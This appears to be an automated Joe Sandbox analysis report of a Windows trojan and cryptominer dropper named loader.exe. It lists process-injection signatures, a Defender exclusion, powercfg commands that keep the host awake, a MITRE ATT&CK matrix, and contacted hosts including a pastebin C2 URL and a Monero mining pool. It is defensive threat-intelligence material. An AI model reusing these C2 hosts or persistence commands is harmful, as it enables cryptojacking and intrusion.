        Source: winlogon.exe, 00000014.00000000.1843622830.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000014.00000002.3146565995.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6236F0 cpuid 20_2_00000225DC6236F0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,11_2_0000000140001B54
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC647960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,20_2_00000225DC647960
        Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Modifies power options to not sleep / hibernate
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		1
        Credential API Hooking        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Web Service        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Native API        		11
        Windows Service        		1
        Access Token Manipulation        		1
        Obfuscated Files or Information        		LSASS Memory1
        File and Directory Discovery        		Remote Desktop Protocol1
        Credential API Hooking        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Service Execution        		Logon Script (Windows)11
        Windows Service        		1
        Install Root Certificate        		Security Account Manager24
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive11
        Encrypted Channel        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook713
        Process Injection        		1
        DLL Side-Loading        		NTDS33
        Security Software Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        File Deletion        		LSA Secrets2
        Process Discovery        		SSHKeylogging3
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
        Rootkit        		Cached Domain Credentials131
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Masquerading        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Modify Registry        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt131
        Virtualization/Sandbox Evasion        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Access Token Manipulation        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd713
        Process Injection        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
        Hidden Files and Directories        		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1537414 Sample: loader.exe Startdate: 18/10/2024 Architecture: WINDOWS Score: 100 55 pastebin.com 2->55 57 pool.hashvault.pro 2->57 67 Suricata IDS alerts for network traffic 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Multi AV Scanner detection for submitted file 2->71 75 10 other signatures 2->75 8 loader.exe 1 2 2->8         started        12 wepulfrfkvoz.exe 1 2->12         started        signatures3 73 Connects to a pastebin service (likely for C&C) 55->73 process4 file5 51 C:\ProgramData\...\wepulfrfkvoz.exe, PE32+ 8->51 dropped 77 Uses powercfg.exe to modify the power settings 8->77 79 Modifies the context of a thread in another process (thread injection) 8->79 81 Adds a directory exclusion to Windows Defender 8->81 14 dialer.exe 1 8->14         started        17 powershell.exe 23 8->17         started        19 cmd.exe 1 8->19         started        28 8 other processes 8->28 53 C:\Windows\Temp\gyqerfjfsbie.sys, PE32+ 12->53 dropped 83 Multi AV Scanner detection for dropped file 12->83 85 Sample is not signed and drops a device driver 12->85 87 Modifies power options to not sleep / hibernate 12->87 21 dialer.exe 12->21         started        23 dialer.exe 12->23         started        26 powershell.exe 12->26         started        30 6 other processes 12->30 signatures6 process7 dnsIp8 89 Contains functionality to inject code into remote processes 14->89 91 Writes to foreign memory regions 14->91 93 Allocates memory in foreign processes 14->93 95 Contains functionality to compare user and computer (likely to detect sandboxes) 14->95 32 lsass.exe 14->32 injected 35 dwm.exe 14->35 injected 41 2 other processes 14->41 97 Loading BitLocker PowerShell Module 17->97 37 conhost.exe 17->37         started        43 2 other processes 19->43 99 Injects code into the Windows Explorer (explorer.exe) 21->99 101 Creates a thread in another existing process (thread injection) 21->101 103 Injects a PE file into a foreign processes 21->103 45 13 other processes 21->45 59 pastebin.com 104.20.4.235, 443, 49735 CLOUDFLARENETUS United States 23->59 61 pool.hashvault.pro 142.202.242.43, 443, 49734, 49736 1GSERVERSUS Reserved 23->61 105 Query firmware table information (likely to detect VMs) 23->105 39 conhost.exe 26->39         started        47 8 other processes 28->47 49 6 other processes 30->49 signatures9 process10 signatures11 63 Installs new ROOT certificates 32->63 65 Writes to foreign memory regions 32->65

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        loader.exe63%ReversingLabsWin64.Trojan.Generic

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe63%ReversingLabsWin64.Trojan.Generic
        C:\Windows\Temp\gyqerfjfsbie.sys5%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl00%URL Reputationsafe
        https://sectigo.com/CPS00%URL Reputationsafe
        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#0%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%URL Reputationsafe
        http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        pool.hashvault.pro
        		142.202.242.43
        		truefalse
          		unknown
          pastebin.com
          		104.20.4.235
          		truetrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://pastebin.com/raw/f2EfCEn0true
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://sectigo.com/CPS0wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://ocsp.sectigo.com0wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zwepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              104.20.4.235
              		pastebin.comUnited States
              		13335CLOUDFLARENETUStrue
              142.202.242.43
              		pool.hashvault.proReserved
              		143151GSERVERSUSfalse

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1537414
              Start date and time:2024-10-18 23:08:06 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 11m 27s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:44
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:17
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:loader.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.mine.winEXE@62/74@2/2
              EGA Information:
              • Successful, ratio: 90.5%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
              • Excluded IPs from analysis (whitelisted): 40.126.31.69, 20.190.159.0, 40.126.31.71, 20.190.159.64, 20.190.159.73, 20.190.159.75, 40.126.31.67, 20.190.159.71
              • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
              • Execution Graph export aborted for target loader.exe, PID 3228 because it is empty
              • Execution Graph export aborted for target wepulfrfkvoz.exe, PID 7348 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • VT rate limit hit for: loader.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              17:09:06API Interceptor1x Sleep call for process: loader.exe modified
              17:09:10API Interceptor40x Sleep call for process: powershell.exe modified
              17:09:47API Interceptor458138x Sleep call for process: winlogon.exe modified
              17:09:48API Interceptor371220x Sleep call for process: lsass.exe modified
              17:09:50API Interceptor3109x Sleep call for process: svchost.exe modified
              17:09:52API Interceptor432423x Sleep call for process: dwm.exe modified
              17:10:01API Interceptor1617x Sleep call for process: dialer.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.20.4.235gabe.ps1Get hashmaliciousUnknownBrowse
              • pastebin.com/raw/sA04Mwk2
              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
              • pastebin.com/raw/sA04Mwk2
              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
              • pastebin.com/raw/sA04Mwk2
              OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
              • pastebin.com/raw/sA04Mwk2
              gaber.ps1Get hashmaliciousUnknownBrowse
              • pastebin.com/raw/sA04Mwk2
              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
              • pastebin.com/raw/sA04Mwk2
              sostener.vbsGet hashmaliciousNjratBrowse
              • pastebin.com/raw/V9y5Q5vv
              sostener.vbsGet hashmaliciousXWormBrowse
              • pastebin.com/raw/V9y5Q5vv
              envifa.vbsGet hashmaliciousRemcosBrowse
              • pastebin.com/raw/V9y5Q5vv
              New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
              • pastebin.com/raw/NsQ5qTHr
              142.202.242.43PT54FFSL7ET46RASB.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, Xmrig, zgRATBrowse
                System.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                  08OyZEWGbf.exeGet hashmaliciousXmrigBrowse
                    zTMEFv0Dh3.exeGet hashmaliciousXmrigBrowse
                      file.exeGet hashmaliciousXmrigBrowse
                        http://5.42.66.10/download/123p.exeGet hashmaliciousXmrigBrowse
                          SecuriteInfo.com.Trojan.Siggen27.52043.15111.6134.exeGet hashmaliciousXmrigBrowse
                            VTbtz4ZUY6.exeGet hashmaliciousXmrigBrowse
                              SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exeGet hashmaliciousXmrigBrowse
                                gQZvXi6Osc.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  pool.hashvault.pro7K5DrSyL8Y.exeGet hashmaliciousXmrigBrowse
                                  • 45.76.89.70
                                  eshkere.batGet hashmaliciousXmrigBrowse
                                  • 95.179.241.203
                                  frik.exeGet hashmaliciousXmrigBrowse
                                  • 95.179.241.203
                                  Google Chrome.exeGet hashmaliciousXmrigBrowse
                                  • 45.76.89.70
                                  e7WMhx18XN.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                  • 45.76.89.70
                                  GcqJPBLD2Q.exeGet hashmaliciousBitCoin Miner, SilentXMRMiner, UACMe, XmrigBrowse
                                  • 45.76.89.70
                                  C5Lg2JSPlD.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                  • 95.179.241.203
                                  file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                  • 45.76.89.70
                                  file.exeGet hashmaliciousXmrigBrowse
                                  • 45.76.89.70
                                  PT54FFSL7ET46RASB.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, Xmrig, zgRATBrowse
                                  • 142.202.242.43
                                  pastebin.comSecuriteInfo.com.Win64.Evo-gen.31489.1077.exeGet hashmaliciousXmrigBrowse
                                  • 172.67.19.24
                                  6TCmDl2rFY.exeGet hashmaliciousDCRatBrowse
                                  • 104.20.4.235
                                  AF1cyL4cv6.vbsGet hashmaliciousAsyncRATBrowse
                                  • 104.20.4.235
                                  FRi4mYXiwD.ps1Get hashmaliciousAsyncRATBrowse
                                  • 104.20.3.235
                                  FmpQycTC2G.ps1Get hashmaliciousAsyncRATBrowse
                                  • 104.20.4.235
                                  4d5ZJqq0M7.vbsGet hashmaliciousAsyncRATBrowse
                                  • 104.20.4.235
                                  PUvfQnmcl4.ps1Get hashmaliciousAsyncRATBrowse
                                  • 172.67.19.24
                                  sys_upd.ps1Get hashmaliciousUnknownBrowse
                                  • 172.67.19.24
                                  cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                  • 104.20.3.235
                                  cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                  • 172.67.19.24

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUShttps://click.pstmrk.it/3s/app.markup.io%2Finvite%2Faccept%2FGAelUtD0/OI9N/z2q4AQ/AQ/914fb818-2548-4566-aa09-a2d85ddc613b/2/KJFV2S8GzwGet hashmaliciousUnknownBrowse
                                  • 104.16.117.116
                                  ZP4KZDHVHWZZ2DC13DMX.exeGet hashmaliciousAmadeyBrowse
                                  • 104.21.52.75
                                  Remittance Advice Ck 34991.htmlGet hashmaliciousHTMLPhisherBrowse
                                  • 188.114.97.3
                                  setup.exeGet hashmaliciousLummaCBrowse
                                  • 188.114.96.3
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 172.67.206.204
                                  z7N__MERODEORDENDECOMPRANO8478PDF.exeGet hashmaliciousFormBookBrowse
                                  • 104.21.48.76
                                  https://na4.docusign.net/Signing/EmailStart.aspx?a=943f47c1-68f1-4387-ae39-91f2830b86a0&etti=24&acct=e7f3e748-8206-4510-8315-0e64f8c91c9b&er=99aeb7e9-c08a-4462-99dc-389e7b080ab6Get hashmaliciousPhisherBrowse
                                  • 104.17.25.14
